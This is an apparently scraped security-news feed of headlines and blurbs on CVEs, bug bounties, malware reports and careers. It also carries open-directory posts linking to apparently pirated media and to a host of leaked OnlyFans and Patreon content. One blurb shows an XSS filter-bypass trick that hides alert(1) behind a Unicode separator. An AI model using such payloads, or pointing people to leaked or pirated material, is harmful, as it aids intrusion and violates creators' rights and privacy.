pick up on something that CrowdStrike does not. Understandably, different companies may expect different responses based on established policy and regulations. But I want to leave it kind of open ended and see what other IT and security professionals believe is appropriate for these types of incidents? How deep do you go for these types of things? submitted by /u/unseenspecter [link] [comments]  ( 2 min )
    IR Retainer things to consider
    When looking to purchase Incident Response Retainers what are things you wish you knew prior to purchasing? Is there any gotchas that should be considered? What can I learn from you in your experience with this? submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    What level of knowledge should Tier 1 SOC analysts have to enter the job?
    Each of the sub-branches of cyber security is like a different world for itself, there is no end when you want to learn. For example, we agree that it is necessary to have knowledge about malware analysis for the position of security analyst. However, if you try to improve yourself in malware analysis, you can probably only work on malware analysis for years. At this point, many people do not know how much technical knowledge required to get started. For this reason, many people can not be accepted to the job due to an insufficient level in job applications, or the starting process may take longer as people spends too much time on training and develops technical knowledge more than the level required to start the job. In your opinion, what should be the technical level required to start working in the security analyst position? submitted by /u/umuttosun [link] [comments]  ( 2 min )
    Infosec as "just" a job?
    Hi, I'm a CS student who's been learning a mishmash of basics to get into infosec — some assembly, wifi cracking, sql injection, etc under my belt, just the very basics, but I'm kind of overwhelmed by how... Enthusiastic and into it everyone seems to be. I'm not sure I'm "built" for it either, since I can't relate to the culture about stuff like lockpicking and causing trouble in school networks and stuff. Never done any social engineering in my life. I'm more of a science guy, and I went into CS because I'm aiming for a practical job that's in STEM. That's it, really. I'm willing to learn things in my spare time but I can't dredge up the same intense curiosity I see in people I've seen both IRL and online in security. Will I drown? Should I look elsewhere? submitted by /u/Wild_Rutabaga_3099 [link] [comments]  ( 4 min )
    Malware playbooks
    I was wondering what you're malware playbooks look like. We got a bunch of malware alerts today for items that were deleted by the av. It caused some internal discussions on common practices. submitted by /u/xX_s0up_Xx [link] [comments]  ( 1 min )
    How to become a pen tester ?
    submitted by /u/AlmightyMemeLord404 [link] [comments]  ( 3 min )
    Any insights on purchasing Palo Alto firewalls for home/lab use?
    I see a wide range of pricing for the PA-200 through 400 models and am not sure why. Anybody else running a small PAN device in their homelab have insight on purchasing a refurb and maybe one or two subscriptions setup on it? Is it best to look for an authorized dealer or is eBay safe? submitted by /u/EnterNam0 [link] [comments]  ( 1 min )
  • Open

    Kubernetes for pentesters
    There’s countless article on hacking kubernetes clusters but is there any research or repos on how you can use k8s for pen testing? One idea is using a cluster in which each node is a “person” that has access to a specific machine or to a different machine. I’m open to other ideas regarding the usage of k8s to improve hacking automation submitted by /u/sirlordjax [link] [comments]  ( 1 min )
    Invisible Sandbox Evasion - Check Point Research
    submitted by /u/dmchell [link] [comments]
    Helping users stay safe: Blocking internet macros by default in Office
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Some OS ISO (Fast Download)
    Some Linux and Windows (Some in Pt/de/ru/en) ISO, The server has a pretty decent speed Url: https://root3.minerswin.de/ISO/ Urls file Extension (Top 5) Files Size .iso 102 195,47 GiB .zip 50 60,06 GiB .xz 18 14,95 GiB .ova 4 11,6 GiB .7z 2 3,7 GiB Dirs: 71 Ext: 12 Total: 323 Total: 288,59 GiB Date (UTC): 2022-02-08 23:22:22 Time: 00:00:03 Speed: 46,65 MB/s (373,2 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Random Stuff in French
    http://5.196.72.204/ Url: http://5.196.72.204/ Urls file Extension (Top 5) Files Size .mkv 141 459,53 GiB .avi 99 70,71 GiB .mp4 533 51,46 GiB .tar 1 28 GiB .m2ts 33 27,8 GiB Dirs: 532 Ext: 58 Total: 4 362 Total: 683,72 GiB Date (UTC): 2022-02-08 23:08:45 Time: 00:00:07 Speed: 11,11 MB/s (88,9 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    French Film & Series
    http://www.zoppello.fr/download/ Url: http://www.zoppello.fr/download/ Urls file Extension (Top 5) Files Size .mkv 937 668,57 GiB .avi 66 68,38 GiB .mp4 61 22,63 GiB .ts 5 17 GiB .flv 17 7,07 GiB Dirs: 187 Ext: 15 Total: 1 405 Total: 790,34 GiB Date (UTC): 2022-02-08 23:07:02 Time: 00:00:04 Speed: 11,05 MB/s (88,4 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    South Park
    Hey everyone looking for South Park season downloads thanks in advance submitted by /u/Los-Aragon [link] [comments]
  • Open

    SharpSQL: C# MS SQL enum and exploitation
    submitted by /u/IamaCerealKilla [link] [comments]
    SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022–22718)
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
    How Docker Made Me More Capable and the Host Less Secure
    submitted by /u/jat0369 [link] [comments]
    AWS Cloud Security Challenges
    submitted by /u/0xdeadbeef0000 [link] [comments]
    PPE - Poisoned Pipeline Execution. Running malicious code in your CI, without access to your CI
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]  ( 1 min )
    How open-source packages handle releasing security fixes
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    VSCode Remote Development Extension Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21991 Comments URL: https://news.ycombinator.com/item?id=30262516 Points: 8 # Comments: 0
  • Open

    100 Days of Hacking — DAY 4
    Objectives of day 4 : Continue reading on Medium »  ( 1 min )
    SQL Injection, Reflected XSS and Information Disclosure in one subdomain in just 10 minutes
    Hi there, 7odamo is here. First of all this is my first write-up and i am still beginner, So i might write something wrong,Then it’s… Continue reading on Medium »  ( 3 min )
    100 DAYS OF HACKING — DAY 3
    woohoo, sup fellow hackers. it’s day 3 / 100 we have a long way to go. Continue reading on Medium »  ( 1 min )
    Securing Lichess one move at a time
    Hi there, thanks for stopping by and taking some time to read my blog post about how I helped secure my favorite chess playing which if… Continue reading on Medium »  ( 1 min )
    Privilege Escalation Using Wildcard Injection | Tar Wildcard Injection |
    This blog is about how to use Wildcard Injection to escalate privileges to root in Unix-like OS. Continue reading on System Weakness »  ( 2 min )
    Full Account takeover (ATO) — a tale of two bugs
    Hi everyone, I hope we’re all having a swell day. Before I jump into today's bug report, I’d like to express my sincerest gratitude for… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »  ( 2 min )
    APWine Incorrect Check of Delegations Bugfix Review
    In the Web2 world, a simple oversight in the code doesn’t always result in a huge breach of data (of course, sometimes they do). In Web3… Continue reading on Immunefi »  ( 4 min )
    2FA Bypass Techniques
    Hello lads, it’s me again. Let’s discuss different techniques about bypassing 2FA. Continue reading on Medium »  ( 2 min )
    You Can Takeover Any GOOGLE Account !
    Thank you for taking the time to read about “ You Can Takeover Any GOOGLE Account ! ” Continue reading on Medium »  ( 2 min )
  • Open

    What is OSINT(Part 2): Dangers of Oversharing
    This article was written in collaboration with Aardwarewolf Continue reading on Medium »  ( 7 min )
    What is OSINT? (Part 2)
    The dangers of oversharing Continue reading on Medium »  ( 8 min )
  • Open

    Something's Amiss . . .
    Hello everyone...super noob alert: I'm taking a digital forensics class and rather than using the virtual lab decided to do some memory analysis on my machine. Since I know little about computers and even less about what I'm looking at, maybe I'm being paranoid, but maybe you can shed some light? As I don't know the email addresses, nor do email addresses like "stealerbyframe@mail.ru", "360saftfirehackr@qq.com", or my favorite "pizda@qq.com"--inspire confidence, those addresses raised some alarms. I used FTK Imager to do a memory dump on my system. I then used Bulk Extractor to organize the data a bit and the screen shot is some emails I found in the email.txt file result. Why, for example, are they in my computer's memory!? https://preview.redd.it/9orfvtravmg81.png?width=1326&format=png&auto=webp&s=65d81163bcd0e35d26a7cc2c88a5025762e36d9a https://preview.redd.it/80togtravmg81.png?width=509&format=png&auto=webp&s=3d14c00dbe7395beb8e682bd2fe0cc50e7d66277 submitted by /u/Funny-Appearance9167 [link] [comments]  ( 2 min )
    Beginner-level mini-course on starting a new investigation with Autopsy. Covers data organization, documentation, new case creation, ingest modules, basic analysis workflow, and exporting reports.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Beaconfuzz - A Journey into #Ethereum 2.0 Blockchain Fuzzing and Vulnerability Discovery
    submitted by /u/pat_ventuzelo [link] [comments]
    Top 6 Books to learn the Rust Programming Language in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Object Overloading
    Using an OS binary to carry out our bidding has been a tactic employed by Red Teamers for years. This eventually led to us coining the term LOLBIN. This tactic is typically used as a way of flying under the radar of EDR solutions or to bypass application whitelisting by surrounding our code in the... The post Object Overloading appeared first on TrustedSec.  ( 12 min )
  • Open

    Cross-site Scripting (XSS) - Stored | forum.acronis.com
    Acronis disclosed a bug submitted by quadrant: https://hackerone.com/reports/1161241 - Bounty: $50
    Stored Cross-site Scripting on devicelock.com/forum/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1122513 - Bounty: $50
    Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com
    Acronis disclosed a bug submitted by ashmek: https://hackerone.com/reports/1018790
    Attacker Can Access to any Ticket Support on https://www.devicelock.com/support/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1124974 - Bounty: $250
    Information Disclosure via ZIP file on AWS Bucket [http://acronis.1.s3.amazonaws.com]
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1121771
  • Open

    2021年全球工业网络安全态势报告
    六方云结合2021年50篇安全态势周刊内容,详细分析全球工业安全现状,多方位感知工业安全态势,为工业安全相关责任人员提供有效的参考。  ( 1 min )
    无回显条件下的命令执行判断和利用方式研究
    渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显的命令执行点。  ( 1 min )
    FreeBuf早报 | Meta 威胁退出欧洲;网上没有免费“红包”
    Meta 威胁称,如果欧盟不允许该公司的美国运营、应用程序和数据中心分享欧盟用户数据,将考虑退出欧洲。  ( 1 min )
    X站钓鱼邮件应急响应案例分析
    应急响应文章很多,但如何使用SANS、NIST框架模型落地应急响应文章略少,仅以个人观点针对当前X站钓鱼邮件案例进行简单模型化分析  ( 1 min )
    服务全球100强的公司Morley遭勒索攻击,泄露大量用户信息
    泄露的数据类型包括:姓名、地址、社会安全号码、出生日期、客户识别号码、医疗诊断和治疗信息以及健康保险信息。
    上海首份《企业数据合规指引》发布
    《指引》共六章三十八条,主要对企业的数据合规管理架构与风险识别处理规范作出了规定。
  • Open

    CVE-2021-4160: OpenSSL carry propagation bug in some TLS 1.3 default curves
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-4160 Comments URL: https://news.ycombinator.com/item?id=30256773 Points: 2 # Comments: 0  ( 4 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
  • Open

    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
  • Open

    How to Get Rid of the Most Common Types of SEO Spam
    What is SEO Spam? SEO spam is what attackers will inject into a website to attempt to use your SEO ranking for something else not ranked otherwise that will further the attackers’ objective. They spam and destroy the website while trying to generate revenue or achieve some other goal. Due to this, generally, the website owner is completely unaware of what’s going on unless they receive warnings or are added to blocklists. Usually, a hacker will try to avoid being detected by rearranging links that aren’t visible to the average site visitor and only crawlers/index engines can see it.  Continue reading How to Get Rid of the Most Common Types of SEO Spam at Sucuri Blog.

  • Open

    Lots of music
    Mostly 320kbit mp3. Complete collections. Great KISS folder. http://nordserv.no/english/ submitted by /u/inoculatemedia [link] [comments]
    More music some flac
    https://www.aidd.org/conspiracy/03/sounds/mp3s/ submitted by /u/inoculatemedia [link] [comments]
    Rap and R&B
    http://bawkawajwanw.com/Music/ submitted by /u/inoculatemedia [link] [comments]
    QSL.NET 's Old Radio Client Programming Software CPS RSS (Including GR1225 RSS 4.0)
    submitted by /u/Goldmann_Sachs [link] [comments]  ( 1 min )
  • Open

    February Newsletter
    The following is a monthly conglomeration of articles, sites and techniques that we have found both interesting, and beneficial, to our… Continue reading on Medium »  ( 2 min )
    Why Is Iceland So Small- OSINT Challenge 12
    On Jan 17, 2022, OSINT Dojo shared a new OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
  • Open

    Tailscale CVE: TS-2022-001
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-001 Comments URL: https://news.ycombinator.com/item?id=30248447 Points: 2 # Comments: 0  ( 1 min )
    CVE-2021-39137 – a Golang security bug that Rust would have prevented
    Article URL: https://research.nccgroup.com/2022/02/07/a-deeper-dive-into-cve-2021-39137-a-golang-security-bug-that-rust-would-have-prevented/ Comments URL: https://news.ycombinator.com/item?id=30244773 Points: 4 # Comments: 0  ( 7 min )
  • Open

    How we could have listened to anyone’s call recordings.
    About Us: Detect, Prioritize and Negate Cloud Security Threats that matter! https://pingsafe.com Continue reading on Medium »  ( 3 min )
    Rce via Image (jpg,png) File Upload..!
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    Subdomain Takeover
    What is subdomain? Continue reading on Medium »  ( 3 min )
    How to Install BFAC on Kali Linux
    BFAC (Backup File Artifacts Checker): Tool to check backup artifacts that may disclose the web-application’s source code | Sensitive… Continue reading on Medium »  ( 1 min )
    The story of Scamster Tony Capo: Aggressive Cyber Warfare Specialist
    This scamster aka https://tonycapo.net/ or whatever his real name is, has been scamming people since 2019, There are multiple bad reviews… Continue reading on Medium »  ( 1 min )
    How We “Forced” Our Client To Fix A Low Severity Security Bug And Still Got Appreciated!
    We at DefCore Security intend to provide great visibility to clients while working on the pentest engagement. We give our clients the… Continue reading on Medium »  ( 3 min )
    Error: Please run “shodan init ” before using this command
    Hello All, if you ever tried running shodan in Kali Linux and got shodan init error. Then keep reading….! Continue reading on Medium »  ( 1 min )
    Is my organization ready for a bug bounty program?
    Bug Bounty programs can be a great thing for both the organization, as well as for the hacker. The question is, can every organization… Continue reading on Medium »  ( 3 min )
    RCE in .tgz file upload
    Cre: Machevalia’s Blog Continue reading on Medium »  ( 2 min )
    CEH Practical Exam Guide
    Exam Information Continue reading on Medium »  ( 2 min )
  • Open

    How to Make Package Signing Useful
    submitted by /u/dlorenc [link] [comments]
    SHA-256 explained step-by-step visually
    submitted by /u/jandrusk [link] [comments]  ( 2 min )
    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]
    A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
    submitted by /u/digicat [link] [comments]  ( 1 min )
    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    UEFI firmware vulnerabilities affect at least 25 computer vendors
    submitted by /u/TryptamineEntity [link] [comments]  ( 1 min )
    Linux Persistence using Systemd Generators. They will run early at boot and can be used to create services and disable other services before they start.
    submitted by /u/dashboard_monkey [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]  ( 1 min )
  • Open

    Application level DOS at Login Page ( Accepts Long Password )
    Reddit disclosed a bug submitted by e100_speaks: https://hackerone.com/reports/1168804
    Leaking sensitive information through JSON file path.
    Nextcloud disclosed a bug submitted by rohitburke: https://hackerone.com/reports/1211061
  • Open

    SecWiki News 2022-02-07 Review
    ML-DOCTOR:对机器学习模型推理攻击的全局性研究 by ourren 黑灰产识别与溯源 by ourren 侠盗猎车 -- 玩转滚动码(中) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-07 Review
    ML-DOCTOR:对机器学习模型推理攻击的全局性研究 by ourren 黑灰产识别与溯源 by ourren 侠盗猎车 -- 玩转滚动码(中) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Email platform Zimbra issues hotfix for XSS vulnerability under active
    Article URL: https://portswigger.net/daily-swig/email-platform-zimbra-issues-hotfix-for-xss-vulnerability-under-active-exploitation Comments URL: https://news.ycombinator.com/item?id=30246174 Points: 1 # Comments: 0  ( 4 min )
  • Open

    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    KillDefenderBOF: Beacon Object File PoC implementation of KillDefender
    submitted by /u/5ub34x_ [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]
  • Open

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
  • Open

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
  • Open

    FreeBuf早报 | DHS将着力解决log4j漏洞问题;教育行业成2021年网络攻击重灾区
    该软件的广泛使用和易于利用使它成为一个极其严重的漏洞,而DHS的最佳实践是集中精力对log4j软件库和相关补救过程中的漏洞进行审查。  ( 1 min )
    PayBito 加密货币交易所遭受网络攻击,大量数据信息被盗
    LockBit勒索软件团伙称从PayBito加密货币交易所窃取了大量客户数据。  ( 1 min )
    多趟航班延误!瑞士Swissport空港服务公司遭勒索软件攻击
    瑞士国际空港服务有限公司(Swissport International Ltd.)遭勒索软件攻击,导致多趟航班延误。
    冬训营丨移动终端高级威胁的新挑战与对抗发现
    据公开数据统计,至2021年中,移动互联网用户规模已达到10.07 亿。  ( 1 min )
    冬训营丨威胁框架的新进展
    本文从三个方面,即新内容、新方向和新力量,介绍与分析了2021年度威胁框架ATT&CK在研究与应用方面的新进展。  ( 1 min )
    冬训营丨商用密码应用建设解决方案
    随着数字化、网络化、智能化的深入发展,大数据、云计算、区块链、AI等技术的变革,不断催生出各行业的新业态。  ( 1 min )
    微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
    自2021年1月到2021年12月,微软阻止了超过256亿次 Azure AD暴力验证攻击,并拦截了357亿封网络钓鱼电子邮件。  ( 1 min )
  • Open

    I'm feeling like I'm underpaid at $60k CAD in Montreal Canada
    Hi everyone, I'm currently working as an information security analyst for this non-tech company here in Montreal Canada for 9 months already. I have 7 years of total work experience (5 years customer service, 2 years as an IT tech + SysAdmin). I have the Azure Security Engineer Associate AZ-500 certification. I'm currently paid 60k CAD Since I'm the only security analyst in my organization, I'm the only one leading multiple security projects. My company have multiple divisions across Canada, South America and Asia with around 1000 employees. My first project after landing the job was the deployment of Bitlocker on every laptop and modern desktop in the company. One of the big project I'm currently running alone is the architecting and deployment of MFA across all employees and all our divisions + deployment of a new VPN solution for employees, with Multi Factor Authentication on every VPN connection. My biggest duties outside of projects are threat detection and response, training and security awareness to employees, and patching old and vulnerable systems. I think I was lucky to find a security role with no prior security experience, but I feel like I'm underpaid. And my annual evaluation is coming in a month. Should I look around for jobs that could pay me better? Should I meet with my manager and ask for a raise ? Thank you Edit: added "architecting MFA" submitted by /u/hey_its_meeee [link] [comments]  ( 2 min )
    Do penetration testers ever get called in at 3AM?
    submitted by /u/notburneddown [link] [comments]  ( 3 min )
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30517(七)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) 从 0 开始学 V8 漏...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30517(七)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) 从 0 开始学 V8 漏...

  • Open

    Paragraph Separator(U+2029) XSS
    Gareth Heyes가 재미있는 XSS 트릭을 하나 공유했는데요. Browser가 이를 처리하는 방식을 잘 생각해보면, 여러 형태로 우회하는데 사용할 수 있을 것 같단 느낌이 들었습니다. 간단한 내용이니 한번 같이 살펴보시죠 😎 U+2029 XSS #!@*%
alert(1) 일반적으로 위와 같은 생긴 코드를 눈으로 본다면 절대 실행되지 않을거라 생각하실겁니다. 그럼 한번 복사해서 브라우저에 붙여넣어볼까요? ??!?!? 네 alert이 발생합니다. 이는 $와 alert 사이에 있는 특수문자 즉 Paragraph Separator로 인해 브라우저가 이를 잘라서 인식했기 떄문에 동작합니다.
    개발자만? 아니 우리도 스크래치 패드 필요해! Boop!
    저는 종종 재미있는 앱이 있을지 앱스토어를 둘러보곤 합니다. 그러던 중 보안 테스팅에서 쓸만할 것 같은 도구를 찾아 이번 연휴동안 사용해보고, 괜찮다고 느껴서 블로그를 통해 공유해봅니다. 바로 Boop 입니다. Boop Boop는 개발자를 위한 scratch pad라고 생각하시면 좋습니다. 코드나 여러가지 데이터 등을 작성/수정하면서 쉽게 치환 등을 기능을 사용할 수 있는 작은 에디터입니다. 공식 Github에서도 아래와 같이 소개하고 있습니다. A scriptable scratchpad for developers. In slow yet steady progress. Boop에서 CMD+b를 눌러 action 리스트를 불러옵니
  • Open

    The devil is in the details [Authentication Bypass]
    Hello, I’m Taha. Today, I’ll go over one of the vulnerabilities I was rewarded for last month. I hope you enjoy this write-up. Continue reading on Medium »  ( 1 min )
    How To Start BBJ (Bug Bounty Journey)
    Hello Hacker’s & Security Guys Thanks for Your Support So Continue reading on Medium »  ( 1 min )
    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
    Penetration Testing vs Bug Bounty
    When you have a fixed payload list, a fixed methodology, a fixed approach, then effectively penetration testing and bug bounty hunting are… Continue reading on Medium »  ( 2 min )
    How I found a critical P1 bug in 5 minutes using a cellphone — Bug Bounty
    Hello Hackers, I’m MrEmpy I’m 16 and welcome to my first article about a critical bug I found on mobile. Continue reading on Medium »  ( 1 min )
    First Bug Bounty Program found CORS (Cross Origin Resource Sharing ) Misconfiguration
    Hello fellow Security researchers and beginners , in this blog I will be explaining the CORS vulnerability and how I found a potential… Continue reading on Medium »  ( 2 min )
  • Open

    End-2-End file transfer
    Hi, I want to download a file directly from a friend computer, what's the most secure way to do it with an encrypted tunnel ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    GRC - recommend reading material
    Will be starting a new role in GRC in a couple of months time and wanted to see if anyone great reading sources to help hit the ground running. Currently reading the business minded CISO which has helped quite a bit! submitted by /u/SecMac [link] [comments]  ( 1 min )
    Book Recommendations for Memory Level Security
    Hi, I would like to ask a book advice to understand how operating systems memory level operations work. For example i want to understand how stack and heap level exploits work on both Windows and Linux systems and what security measures this operating systems have to prevent attacks like heap buffer overflow, process injection and hijacking etc. Where should I start to understand memory level operations on operating systems? Should I know programming languages like C because OSs mostly written in C? submitted by /u/execute_sh [link] [comments]  ( 1 min )
    How safe are Password Managers Actually?
    Hi, both Bitwarden and 1password are open source. Can anyone in the backend team has a way to look at our passwords? I mean the devs who made those apps must have a way whatsoever? Being double sure before using. What are your thoughts? submitted by /u/TheRealistDude [link] [comments]  ( 3 min )
    How do blackhats monetize stolen accounts without being caught?
    Suppose a blackhat has gotten a victim's e-mail, banking, PayPal etc. account infos, how do they monetize this information without leaving a trail leading back to them? I can't make sense of this. Thanks. submitted by /u/DirectionProof710 [link] [comments]  ( 1 min )
  • Open

    Arbitrary file read in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/943737
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    Miscellaneous NSFW Content from Patreon, Onlyfans, Snapchat, Fansly etc..
    https://theporngrid.com/Uploads/Media/ There's a combination of images and videos from a bunch of different original sources, mostly onlyfans and the like. Everything here is used by ibradome.com (NSFW) for their embedded content I indexed the files: https://gist.githubusercontent.com/RedDeadRandy/bda22a2b6014315597df2259a03815e2/raw/fe1ba95b5d2ec0d2a3e7ebcce96db21c1eda0152/theporngrid_files.txt Some of it is watermarked to find out who the person is while others are a crapshoot. submitted by /u/TattedUp [link] [comments]
    /VIDEOS about China. mostly unexplored PD. to be safe NSFW
    submitted by /u/thats_dumberst [link] [comments]
    Large directory of film scripts, different formats
    http://nldslab.soe.ucsc.edu/charactercreator/film_corpus/film_20100519/all_imsdb_05_19_10/ submitted by /u/inoculatemedia [link] [comments]
    funeral parlour decor and accessories
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    GUARDARA is now free for independent security researchers and non-commercial open-source projects
    submitted by /u/JohnKeymanUK [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 08
